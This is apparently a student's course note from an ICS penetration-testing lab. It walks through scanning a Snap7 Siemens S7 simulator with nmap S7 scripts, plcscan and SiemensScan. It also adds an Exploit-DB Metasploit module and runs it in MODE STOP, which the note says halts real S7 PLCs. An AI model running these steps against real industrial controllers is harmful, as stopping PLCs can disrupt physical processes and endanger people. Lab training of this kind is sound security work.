type: guide
title: "05-practical_2"
source: "Inbox import"
tags:
  - topic/techint
  - topic/osint
  - method/review
processed: true
status: seedling

05-practical_2

Nota importada desde Inbox durante consolidacion bulk.

Practical - part 2

Starting the Siemens S7 simulator - Snap7

on Ubuntu VM start python with: python3

then run the following code:

import snap7
s7 = snap7.server.Server()
s7.create()
s7.start()

s7.get_Status()

Now switch to Kali VM. We know the ubuntu host is 10.1.0.11 so wont go through the steps to discover these with netdiscover and nmap. However here are the commands:
sudo netdiscover -r 10.1.0.0/24
sudo nmap 10.1.0.11 -Pn -p 1-65535

Nmap NSE scripts

Look at port 102 specifically but first find the nmap scripts relevant to s7
find /usr/share/nmap/ -name s7*.nse

this will give the following two files:

/usr/share/nmap/scripts/s7-info.nse
/usr/share/nmap/scripts/s7-enumerate.nse

Now scan port 102 using the info script
sudo nmap 10.1.0.11 -Pn -p 102 --script s7-info.nse

Now scan port 102 using the enumerate script
sudo nmap 10.1.0.11 -Pn -p 102 --script s7-enumerate.nse

plcscan

Navigate to the plcscan folder
cd ~/gits/plcscan

sudo python2 plcscan.py 10.1.0.11 to run plcscan

Metasploit and Exploit DB

sudo msfconsole to start MSF

Once started, run search Siemens to find modules related to Siemens.

Search exploit db for all modules with name Siemens with searchsploit Siemens

use <number> to use a specific result from search.

Adding external exploits to msf by dong the following:
open file system as root.

navigate to usr/share/exploitdb/exploits/hardware/remote/38964.rb where the exploitdb files are kept. Copy the exploit file and paste into usr/share/metasploit-framework/modules/exploits/hardware/remote/38964.rb. We will need to create the hardware and remote folders.

restart msf

Once restarted one can use the newly copied exploit use hardware/remote/38964.rb

Now set the target parameters:
setg RHOSTS 10.1.0.11 to set global RHOSTS

set MODE STOP and start module with run

This only has an effect on real S7 modules and no effect on Snap7 simulation.

SiemensScan

Navigate to ICSSecurityScripts cd ~/gits/ICSSecurityScripts. Then run
sudo python3 SiemensScan.py

This discovers S7 devices on the network, but doesnt discover the snap7 simulation.

Next Section -> Real S7 Hardware

Back to Table of Contents

Themes

tema-curso-ics-pentesting